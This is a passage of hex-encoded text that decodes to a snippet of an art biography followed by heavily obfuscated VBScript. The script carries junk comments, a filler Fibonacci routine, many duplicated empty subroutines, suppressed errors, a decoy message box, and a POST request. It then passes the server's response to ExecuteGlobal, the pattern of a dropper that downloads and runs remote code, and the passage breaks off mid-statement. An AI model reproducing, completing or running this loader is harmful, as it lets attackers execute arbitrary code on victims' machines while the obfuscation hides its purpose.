x6e\x64\x73\x20\x77\x65\x72\x65\x20\x74\x68\x65\x20\x66\x69\x6c\x6d\x6d\x61\x6b\x65\x72\x73\x20\x43\x75\x72\x74\x69\x73\x20\x48\x61\x72\x72\x69\x6e\x67\x74\x6f\x6e\x20\x61\x6e\x64\x20\x4b\x65\x6e\x6e\x65\x74\x68\x20\x41\x6e\x67\x65\x72\x2e\x20\x53\x68\x65\x20\x61\x70\x70\x65\x61\x72\x65\x64\x20\x69\x6e\x20\x74\x77\x6f\x20\x6f\x66\x20\x48\x61\x72\x72\x69\x6e\x67\x74\x6f\x6e\x27\x73\x20\x66\x69\x6c\x6d\x73\x2c\x20\x54\x68\x65\x20\x57\x6f\x72\x6d\x77\x6f\x6f\x64\x20\x53\x74\x61\x72\x20\x61\x6e\x64\x20\x4e\x69\x67\x68\x74\x20\x54\x69\x64\x65\x2c\x20\x61\x73\x20\x77\x65\x6c\x6c\x20\x61\x73\x20\x69\x6e\x20\x0d\x0a\x27\x41\x6e\x67\x65\x72\x27\x73\x20\x66\x69\x6c\x6d\x20\x49\x6e\x61\x75\x67\x75\x72\x61\x74\x69\x6f\x6e\x20\x6f\x66\x20\x74\x68\x65\x20\x50\x6c\x65\x61\x73\x75\x72\x65\x20\x44\x6f\x6d\x65\x2e\x20\x49\x6e\x20\x6c\x61\x74\x65\x72\x20\x79\x65\x61\x72\x73\x2c\x20\x73\x68\x65\x20\x6d\x61\x64\x65\x20\x61\x70\x70\x65\x61\x72\x61\x6e\x63\x65\x73\x20\x69\x6e\x20\x61\x72\x74\x2d\x68\x6f\x75\x73\x65\x20\x66\x69\x6c\x6d\x73\x20\x63\x72\x65\x61\x74\x65\x64\x20\x62\x79\x20\x4a\x6f\x68\x6e\x20\x43\x68\x61\x6d\x62\x65\x72\x6c\x61\x69\x6e\x20\x61\x6e\x64\x20\x43\x68\x69\x63\x6b\x20\x53\x74\x72\x61\x6e\x64\x2e\x20\x0d\x0a\x27\x43\x61\x6d\x65\x72\x6f\x6e\x27\x73\x20\x72\x65\x63\x6f\x67\x6e\x69\x74\x69\x6f\x6e\x20\x61\x73\x20\x61\x6e\x20\x61\x72\x74\x69\x73\x74\x20\x69\x6e\x63\x72\x65\x61\x73\x65\x64\x20\x61\x66\x74\x65\x72\x20\x68\x65\x72\x20\x64\x65\x61\x74\x68\x2c\x20\x61\x6e\x64\x20\x68\x65\x72\x20\x70\x61\x69\x6e\x74\x69\x6e\x67\x73\x20\x77\x65\x72\x65\x20\x73\x68\x6f\x77\x6e\x20\x69\x6e\x20\x65\x78\x68\x69\x62\x69\x74\x69\x6f\x6e\x73\x20\x61\x63\x72\x6f\x73\x73\x20\x74\x68\x65\x20\x63\x6f\x75\x6e\x74\x72\x79\x2e\x20\x28\x46\x75\x6c\x6c\x20\x61\x72\x74\x69\x63\x6c\x65\x2e\x2e\x2e\x29\x20\x0d\x0a\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x46\x75\x6e\x63\x74\x69\x6f\x6e\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x28\x4e\x29\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x20\x49\x66\x20\x4e\x20\x3c\x20\x32\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x20\x20\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x20\x3d\x20\x4e\x0d\x0a\x20\x20\x45\x6c\x73\x65\x0d\x0a\x20\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x20\x20\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x20\x3d\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x28\x4e\x20\x2d\x20\x31\x29\x20\x2b\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x28\x4e\x20\x2d\x20\x32\x29\x0d\x0a\x20\x20\x45\x6e\x64\x20\x49\x66\x0d\x0a\x45\x6e\x64\x20\x46\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x46\x6f\x72\x20\x70\x61\x73\x64\x73\x61\x73\x73\x61\x73\x69\x20\x3d\x20\x31\x20\x54\x6f\x20\x31\x36\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x09\x61\x73\x64\x73\x61\x6f\x6e\x73\x61\x73\x72\x65\x73\x20\x3d\x20\x61\x73\x64\x73\x61\x6f\x6e\x73\x61\x73\x72\x65\x73\x20\x26\x20\x70\x69\x64\x6f\x6d\x73\x61\x73\x6c\x73\x69\x73\x63\x6e\x61\x63\x63\x69\x28\x70\x61\x73\x64\x73\x61\x73\x73\x61\x73\x69\x29\x20\x26\x20\x22\x3b\x20\x22\x0d\x0a\x4e\x65\x78\x74\x0d\x0a\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x0d\x0a\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x20\x27\x39\x32\x36\x32\x32\x0d\x0a\x20\x53\x55\x42\x20\x66\x6f\x66\x6f\x66\x73\x45\x78\x74\x65\x6e\x73\x69\x6f\x6e\x28\x29\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x46\x4f\x52\x20\x45\x41\x43\x48\x20\x63\x6f\x6c\x6b\x61\x73\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x20\x69\x6e\x20\x64\x6f\x6d\x61\x73\x74\x73\x73\x6a\x46\x6f\x6c\x64\x65\x72\x2e\x62\x6f\x62\x6f\x61\x73\x64\x73\x46\x6f\x6c\x64\x65\x72\x73\x0d\x0a\x09\x20\x6d\x65\x74\x69\x6f\x73\x61\x73\x0d\x0a\x09\x4e\x45\x58\x54\x0d\x0a\x45\x4e\x44\x20\x53\x55\x42\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x44\x69\x6d\x20\x6d\x61\x73\x6f\x6c\x61\x73\x6c\x6d\x73\x64\x73\x64\x2c\x6b\x6f\x6b\x6f\x73\x73\x56\x61\x72\x53\x2c\x6e\x69\x6e\x69\x73\x61\x6f\x73\x64\x73\x61\x73\x73\x61\x73\x69\x2c\x20\x78\x6f\x73\x6c\x6f\x73\x78\x78\x6f\x70\x73\x2c\x72\x65\x61\x73\x70\x6f\x73\x4d\x69\x6c\x6f\x73\x0d\x0a\x6b\x6f\x6b\x6f\x73\x73\x56\x61\x72\x53\x20\x3d\x20\x32\x2b\x33\x2b\x32\x2b\x31\x2b\x35\x2b\x20\x33\x2b\x32\x2b\x20\x31\x20\x2b\x20\x38\x20\x2d\x33\x20\x2d\x20\x32\x20\x2d\x32\x0d\x0a\x6d\x61\x73\x6f\x6c\x61\x73\x6c\x6d\x73\x64\x73\x64\x20\x3d\x20\x32\x2b\x33\x2b\x32\x2b\x31\x2b\x35\x2b\x20\x33\x2b\x20\x34\x2b\x31\x20\x2b\x20\x31\x32\x20\x2b\x31\x20\x2b\x32\x20\x2b\x33\x0d\x0a\x0d\x0a\x72\x65\x61\x73\x70\x6f\x73\x4d\x69\x6c\x6f\x73\x20\x3d\x20\x22\x69\x64\x3d\x31\x31\x31\x22\x0d\x0a\x27\x39\x32\x36\x32\x32\x0d\x0a\x6d\x53\x67\x42\x4f\x58\x20\x22\x2d\x20\x4e\x30\x54\x20\x53\x65\x61\x72\x63\x68\x3a\x20\x22\x20\x26\x20\x61\x73\x64\x73\x61\x6f\x6e\x73\x61\x73\x72\x65\x73\x0d\x0a\x20\x0d\x0a\x20\x44\x69\x6d\x20\x6c\x69\x6b\x73\x61\x6f\x72\x65\x73\x70\x6f\x6e\x73\x65\x2c\x20\x64\x6f\x6d\x61\x6e\x69\x73\x64\x64\x6f\x6d\x61\x69\x6e\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x09\x64\x6f\x6d\x61\x6e\x69\x73\x64\x64\x6f\x6d\x61\x69\x6e\x20\x3d\x20\x22\x22\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x09\x6e\x69\x6e\x6f\x73\x5a\x65\x72\x6f\x72\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x09\x0d\x0a\x78\x6f\x73\x6c\x6f\x73\x78\x78\x6f\x70\x73\x20\x3d\x20\x22\x50\x4f\x53\x54\x22\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x0d\x0a\x46\x75\x6e\x63\x74\x69\x6f\x6e\x20\x64\x6f\x6b\x69\x6e\x61\x73\x54\x65\x73\x74\x53\x28\x29\x0d\x0a\x09\x27\x39\x32\x36\x32\x32\x0d\x0a\x09\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x09\x45\x78\x65\x63\x75\x74\x65\x47\x6c\x6f\x62\x61\x6c\x20\x22\x22\x20\x2b\x20\x6c\x69\x6b\x73\x61\x6f\x72\x65\x73\x